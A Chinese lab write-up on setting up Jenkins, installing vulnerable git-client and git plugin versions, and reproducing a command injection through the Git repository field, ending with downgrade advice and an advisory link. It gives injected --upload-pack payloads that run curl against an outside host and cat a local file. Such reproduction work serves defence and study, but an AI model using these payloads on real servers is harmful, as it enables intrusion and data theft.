jenkins搭建、插件安装、漏洞利用、修复意见

一、Jenkins搭建

可以去Jenkins的官网找到搭建过程。根据自己的环境需求来选择相应的版本。官网下载地址https://jenkins.io/zh/download/

建议在虚拟机里面进行搭建并复现漏洞，避免在物理机中直接安装。我使用的是CentOS系统，点击后会有详细的安装步骤，以及需要的java版本。我们要事先安装好java后才可以使用Jenkins。

需要注意的是：
1.尽量不要用yum install Jenkins来安装，下载速度非常慢。根据官方提供的安装步骤先完成yum安装前面的步骤，自行下载rpm包，上传至虚拟机。然后执行命令：rpm -ivh [Jenkins的rpm包名] 进行安装。
2.如果使用CentOS进行安装，需要注意java的版本，使用java -verison查看，如果显示的是下图这样的输出，那么该版本的java与Jenkins不兼容。

不兼容的java版本

兼容的java版本

安装完rpm包后可以访问http://IP:8080来进行Jenkins的图形化界面安装。根据提示一步步来就好。

这里解决一个出现的问题，就是访问http://IP:8080后一直显示Please wait while Jenkins is getting ready to work ………如果长时间没有进行跳转，那么需要进入Jenkins的工作目录（我的目录是/var/lib/jenkins/）打开hudson.model.UpdateCenter.xml文件。将里面的 http://updates.jenkins-ci.org/update-center.json修改为 http://mirror.xmission.com/jenkins/updates/update-center.json然后重启Jenkins，就可以解决该问题。

二、插件安装

这是安装好的Jenkins界面

在系统管理->管理用户中新建一个非管理员用户

在系统管理->全局安全配置->授权策略中，选择安全矩阵。添加刚刚创建的用户，并且给予权限。

下载漏洞版本的插件

http://updates.jenkins-ci.org/download/plugins/git-client/2.8.2/git-client.hpi
http://updates.jenkins-ci.org/download/plugins/git/3.12.0/git.hpi

在系统管理->插件管理->高级中上传插件并安装

三、漏洞利用

安装完成后，新建一个项目，选择自由风格软件项目。点击保存后，在源码管理中选择git。此时就可以输入想要执行的命令了。

–upload-pack=”`curl http://192.168.120.62:81`”

执行结果

在/home下创建一个文件test，在里面随便输入了一些内容。

再回到Jenkins中执行验证一下显示的内容是不是我们在test中输入的–upload-pack=”`cat /home/test`”

成功显示出了test文件里的内容~

四、修复建议

建议Git客户端插件3.0.0-rc的用户降级到2.8.5（并将Git插件从4.0.0-rc 降级到最新的3.x版本以解决依赖性问题）。

官方安全性说明

https://jenkins.io/security/advisory/2019-09-12/